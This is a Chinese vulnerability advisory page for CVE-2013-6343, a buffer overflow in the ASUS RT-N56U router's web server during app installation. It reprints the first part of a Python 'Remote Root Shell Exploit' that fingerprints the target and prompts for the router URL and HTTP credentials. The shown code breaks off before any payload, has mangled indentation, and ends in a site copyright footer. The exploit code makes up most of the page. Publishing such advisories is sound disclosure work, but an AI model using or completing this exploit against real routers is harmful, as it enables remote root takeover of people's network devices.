flag' 参数缓冲区溢出漏洞

发布日期:2014-01-21
更新日期:2014-01-23

受影响系统:
Asus RT-N56U 3.0.0.4.374_979
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 65046
CVE(CAN) ID: CVE-2013-6343

ASUS RT-N56U是无线宽带路由器。

ASUS RT-N56U 固件版本3.0.0.4.374_979及之前版本在安装新应用时,由路由器Web服务器处理安装进程,安装进程易于受到多个缓冲区溢出漏洞的攻击,可导致攻击者在受影响设备上下文中执行任意代码。

<*来源:Jacob Holcomb
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

#!/usr/bin/env python

from time import sleep
from sys import exit
import urllib2, signal, struct, base64, socket, ssl

# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
# [*] Discovered and Reported: October 2013
# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
# [*] Contact: Twitter - @rootHak42
# [*] Software Vendor:
# [*] Exploit/Advisory: ,
# [*] Software: httpd (Listens on TCP/80 and TCP/443)
# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
#
# [*] Overview:
#      Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
#      supplemental applications. This install process is handled by the routers web server,
#      and is susceptible to multiple Buffer Overflow attacks.
#
#      Vulnerable Web Page: APP_Installation.asp
#      Vulnerable HTML Parameters: apps_name, apps_flag
#      Vulneralbe Source File: web.c of httpd code
#      *Firmware versions prior to the tested version were vulnerable to this attack.
#


def fingerPrint(host, port, netSock):

fprint = ["RT-N56U"]
    found = None
    print " [*] Preparing to fingerprint the server."
    try:
        print " [*] Connecting to %s on port %d." % (host, port)
        netSock.connect((host, port))
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

try:
        print " [*] Sending fingerprint request."
        netSock.send("HEAD / HTTP/1.1\r\n\r\n")
        netData = netSock.recv(1024)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

try:
        print " [*] Closing network socket.\n"
        netSock.close()
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)

for item in fprint:
        if item in netData:
            print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
            sleep(1)
            found = item
    if found == None:
        print " [!!!] Server banner doesn't match available targets. [!!!]\n"
        sleep(1)
        exit(0)
    else:
        return found


def targURL():

while True:
   
        URL = raw_input("\n[*] Please enter the URL of the router. Ex. \n>")
        if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://":
            return URL.lower()
        else:
            print "\n\n [!!!] Target URL cant be null and must contain or https:// [!!!]\n"
            sleep(1)


def creds():

while True:

User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
        Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
        if len(User) != 0:
            return User, Pass
        else:
            print "\n [!!!] Username cant be null [!!!]\n"
            sleep(1)


def basicAuth():

auth = None

while auth != "yes" and auth != "no":
        auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:http://www.heiqu.com/2eee251a93d27aed33b4d5af150a1b35.html